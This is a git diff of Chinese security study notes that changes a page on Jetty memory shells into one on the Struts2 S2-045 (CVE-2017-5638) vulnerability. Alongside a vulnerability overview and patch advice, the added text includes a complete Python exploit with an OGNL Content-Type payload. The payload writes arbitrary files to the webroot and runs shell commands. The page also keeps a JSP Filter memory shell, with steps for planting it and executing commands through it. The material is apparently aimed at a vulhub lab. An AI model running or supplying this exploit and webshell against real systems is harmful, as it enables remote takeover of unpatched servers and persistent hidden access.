📝 内存马文档迁移

--- a/docs/网络安全/Web安全/漏洞类型/内存马/Java内存马/Struts2内存马/s2-045内存马.md
+++ b/docs/网络安全/Web安全/漏洞类型/内存马/Java内存马/Struts2内存马/s2-045内存马.md
@@ -1,76 +1,105 @@
 ---
-date: 2024-09-19
+date: 2024-09-12
+category:
+  - 网络安全
+  - Web安全
+  - Java
+tags:
+  - 内存马
+  - Struts2
 ---
 
-# Jetty内存马
+# s2-045内存马
 
-Eclipse Jetty 是一个轻量级、高度可扩展、基于 Java 的 Web 服务器和 Servlet 引擎。Jetty 的目标是以高容量、低延迟的方式支持 Web 协议（HTTP/1、HTTP/2、HTTP/3、WebSocket 等），从而提供最高性能，同时保持易用性和与多年 Servlet 开发的兼容性。
-
-Jetty 是一种现代的完全异步 Web 服务器，作为面向组件的技术有着悠久的历史，可以轻松嵌入到应用程序中，同时仍然为 Web 应用程序部署提供可靠的传统发行版。
-
----
-
-## 基本信息收集
-
-### 查看版本号
-
-- Web侧的话
-
-  - 响应标头中可能会有 Jetty 版本信息, 例如:
-
-    ![image-20240918162938756](http://cdn.ayusummer233.top/DailyNotes/202409181629820.png)
-
-  - Wappalyzer 应该也是用的上面这种方案获取的版本信息:
-
-    ![image-20240918163003019](http://cdn.ayusummer233.top/DailyNotes/202409181630064.png)
-
-- 主机侧的话
-
-  - 可以在 JavaWeb 项目的 `pom.xml` 中看到 jetty 的版本号
-
-    ![image-20240918162309589](http://cdn.ayusummer233.top/DailyNotes/202409181623686.png)
-
-  - 直接 `find / | grep jetty` 也可能看到相应路径信息中显示的 jetty 版本信息:
-
-    ![image-20240918162417425](http://cdn.ayusummer233.top/DailyNotes/202409181624482.png)
+> [S2-045 写入内存马 - ccadmin - 博客园 (cnblogs.com)](https://www.cnblogs.com/tide-sec/p/16304736.html)
+>
+> [s2-045真正一键getshell菜刀马-突破任何限制 | pirogue](http://pirogue.org/2017/03/09/s2-045真正一键getshell菜刀马-突破任何限制/)
 
 ---
 
-## 构造可用的 Servlet
+## 漏洞概述
 
-Jetty 9.2.x 提供了更加安全且可维护的方式来处理 `Servlet` 的动态注册
+- 漏洞编号: CVE-2017-5638 Struts2远程代码执行漏洞
+- 漏洞类型: 远程代码执行漏洞
+- 危险等级: 高危
+- 利用条件: Struts2在受影响版本内，并包含Commons-FileUpload、Commons-IO库
+- 受影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
 
-可以通过 `ServletHandler` 和 `ServletHolder` 来动态注册 `Servlet`，并设置 URL 映射。这不再需要反射访问私有字段
+Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。
 
-> TODO: 搞不出来, 看了下 `web.xml` 里也没有配置 servlet mapping 之类的, 遂放弃
+Struts2在受影响版本内，并包含Commons-FileUpload、Commons-IO库时, 该漏洞能够通过构造恶意的 Content-Type 值来执行任意代码。 如果 Content-Type 值无效，则会抛出异常，并向用户显示错误消息，从而能够进一步获取服务器权限。
 
----
-
-## 构造内存马
-
-> [Jetty 内存马注入分析 - 先知社区 (aliyun.com)](https://xz.aliyun.com/t/12182?time__1311=GqGxRDniiQQ0526Dy7D97rTnikxuYoD#toc-3)
->
-> [memShell/src/main/java/com/memshell/jetty/FilterBasedWithoutRequest.java at master · feihong-cs/memShell (github.com)](https://github.com/feihong-cs/memShell/blob/master/src/main/java/com/memshell/jetty/FilterBasedWithoutRequest.java)
->
-> [3gstudent-Blog](https://3gstudent.github.io/)
->
-> [Java利用技巧——Jetty Servlet型内存马 (3gstudent.github.io)](https://3gstudent.github.io/Java利用技巧-Jetty-Servlet型内存马)
+- 安装官方补丁升级到最新版本: Struts 2.3.32 or Struts 2.5.10.1
+- 临时修复方法: Struts2 默认使用 Jakarta 的 Common-FileUpload 文件上传解析器, 修改上传解析器为cos或pell。
 
 ---
 
-## Filter内存马
+## 漏洞分析
 
-> [从0到1学会Jetty内存马注入 - 先知社区 (aliyun.com)](https://xz.aliyun.com/t/15141?u_atoken=1f048c5fb527d82d5ec4ba4c07b4c57d&u_asig=0a472f8c17266484778997576e004d)
+> [JavaSec/7.Struts2专区/S2-045漏洞分析/index.md at main · Y4tacker/JavaSec (github.com)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2专区/S2-045漏洞分析/index.md)
 >
-> [memShell/src/main/java/com/memshell/jetty/FilterBasedWithoutRequest.java at master · feihong-cs/memShell (github.com)](https://github.com/feihong-cs/memShell/blob/master/src/main/java/com/memshell/jetty/FilterBasedWithoutRequest.java)
->
-> [Java利用技巧——Jetty Filter型内存马 (3gstudent.github.io)](https://3gstudent.github.io/Java利用技巧-Jetty-Filter型内存马)
->
-> [Jetty 内存马注入分析 - 先知社区 (aliyun.com)](https://xz.aliyun.com/t/12182?time__1311=GqGxRDniiQQ0526Dy7D97rTnikxuYoD#toc-3)
-
-环境: vulhub 的 s2-045 Docker, 其中 Jetty 版本为 9.2.11
+> 
 
 ---
+
+## 命令执行写文件
+
+```python
+import httpx
+from pathlib import Path
+import urllib.parse
+
+
+# 定义读取文件内容的函数
+def read_file(file_path):
+    with open(file_path, "r", encoding="utf-8") as file:
+        return file.read()
+
+
+# 读取 index.jsp 文件的内容
+CURRENT_DIR = Path(__file__).parent
+# file_path = CURRENT_DIR / 'index.jsp'
+file_path = CURRENT_DIR / "testFile.txt"
+
+content = read_file(file_path)
+# encoded_content = content.encode('utf-8')
+content_encoded = urllib.parse.quote(content)
+
+# 设置请求的 URL
+url = "http://192.168.1.215:8080/"
+
+# filename = "/index.jsp"
+filename = "/testFile.txt"
+
+
+# 设置请求头
+headers = {
+    "Upgrade-Insecure-Requests": "1",
+    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+    "Accept-Language": "en-US,en;q=0.8,es;q=0.6",
+    "Connection": "close",
+    "Content-Type": f"%{{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ccccc='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getSession().getServletContext().getRealPath('/')).(#shell='{content_encoded}').(new java.io.BufferedWriter(new java.io.FileWriter(#path+'{filename}').append(new java.net.URLDecoder().decode(#shell,'UTF-8'))).close()).(#cmd='echo \\\"write file to '+#path+'\"+ self.num +\"t00ls.jsp\\\"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:{{'/bin/bash','-c',#cmd}})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}}.multipart/form-data",
+}
+
+# 发送 POST 请求
+response = httpx.post(url, headers=headers)
+
+# 打印响应结果
+print(response.status_code)
+print(response.text)
+
+```
+
+![image-20240920152239164](http://cdn.ayusummer233.top/DailyNotes/202409201522232.png)
+
+![image-20240920152302098](http://cdn.ayusummer233.top/DailyNotes/202409201523134.png)
+
+---
+
+## 命令执行写 Filter 内存马
+
+适用于当前环境的 Filter 内存马:
 
 ```jsp
 <%@ page import="java.lang.reflect.Field"%>
@@ -187,27 +216,43 @@ Jetty 9.2.x 提供了更加安全且可维护的方式来处理 `Servlet` 的动
 %>
 ```
 
-![image-20240920152529930](http://cdn.ayusummer233.top/DailyNotes/202409201525001.png)
+和上一步写文件的操作一样, 将此 JSP 内容写入到 webapp 目录下, 访问此文件对应 URL, 第二次访问如果注册成功会输出 `Filter myFilter exists`:
 
-![image-20240920145928096](http://cdn.ayusummer233.top/DailyNotes/202409201459280.png)
+![image-20240920152602531](http://cdn.ayusummer233.top/DailyNotes/202409201526590.png)
 
-![image-20240920150008171](http://cdn.ayusummer233.top/DailyNotes/202409201500230.png)
+然后使用注入的 filter 路由执行命令即可:
 
----
-
-## Servlet型内存马
-
-> [Java利用技巧——Jetty Servlet型内存马 (3gstudent.github.io)](https://3gstudent.github.io/Java利用技巧-Jetty-Servlet型内存马)
-
-
-
-
+![image-20240920152653579](http://cdn.ayusummer233.top/DailyNotes/202409201526648.png)
 
 ---
 
-## Customizer型内存马
+## Servlet马
 
-> [一种在高版本JDK下 的新型嵌入式Jetty Customizer内存马实现 - 白帽酱の博客 (rce.moe)](https://rce.moe/2023/08/19/Jetty-Customize-memory-webshell/)
+> TODO: vulhub docker 没复现出来, 暂且搁置
+>
+> [S2-045 写入内存马 - ccadmin - 博客园 (cnblogs.com)](https://www.cnblogs.com/tide-sec/p/16304736.html)
+>
+> 
+
+
+
+
+
+---
+
+## 其他内存马
+
+- Github 全局搜索找到的一个 Struts2 内存马, 但是没看出来作用:
+
+  [JYso/src/main/java/com/qi4l/JYso/template/memshellStatic/struts2/Struts2ActionMS.java at master · qi4L/JYso (github.com)](https://github.com/qi4L/JYso/blob/master/src/main/java/com/qi4l/JYso/template/memshellStatic/struts2/Struts2ActionMS.java)
+
+  
+
+
+
+
+
+
 
 
 
